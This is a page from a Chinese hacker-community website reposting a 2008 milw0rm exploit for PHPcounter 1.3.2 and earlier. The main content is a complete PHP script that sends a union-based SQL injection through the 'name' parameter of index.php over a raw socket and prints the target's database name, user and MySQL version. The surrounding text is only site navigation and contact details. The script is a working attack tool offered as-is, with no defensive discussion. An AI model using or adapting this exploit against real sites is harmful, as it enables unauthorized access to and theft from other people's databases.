PHPcounter <= 1.3.2 (index.php name) Remote SQL Injection Exploit - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> 漏洞 >> web apps >> 正文

用户登录

新用户注册

远程SQL注入漏洞

★★★

【字体：小大】

PHPcounter <= 1.3.2 (index.php name) Remote SQL Injection Exploit

作者：milw0rm 文章来源：milw0rm 点击数：更新时间：2008-10-13

#!/usr/bin/php -q
<?php

// PHPcounter <= 1.3.2 Remote SQL Injection Exploit
// Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
// Discovered On: 28/09/2008
// Download: http://sourceforge.net/projects/phpcounter/

error_reporting(0);

$host = $argv[1] or banner();
$path = $argv[2] or banner();
$host = str_replace('http://',NULL,$host);

$isql = "'union select 0,0,0,concat(0x24,database(),0x3a,user(),0x3a,version(),0x24)'/*";
$isql = urlencode($isql);

function banner() {
echo "[?] Usage: php $argv[0] http://example.com /cms\r\n";
exit(0);
}

if(!$sock = fsockopen($host,80)) {
die("Socket Error\r\n");
}

$data .= "GET /$path/index.php?name=$isql HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
$data .= "Connection: close\r\n\r\n";

fputs($sock,$data);

while(!feof($sock)) {
$content .= fgets($sock);
} fclose($sock);

if(preg_match('/\$(.+?)\$/',$content,$out)) {
print "[+] $out[1]\r\n";
}
else {
echo "[!] Exploit Failed!\n";
}

?>

# milw0rm.com

责任编辑：朱倩　　联系方式　Email：朱倩

电话：51228163

上一篇漏洞：聊天室 SQL注入漏洞

下一篇漏洞：没有了

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913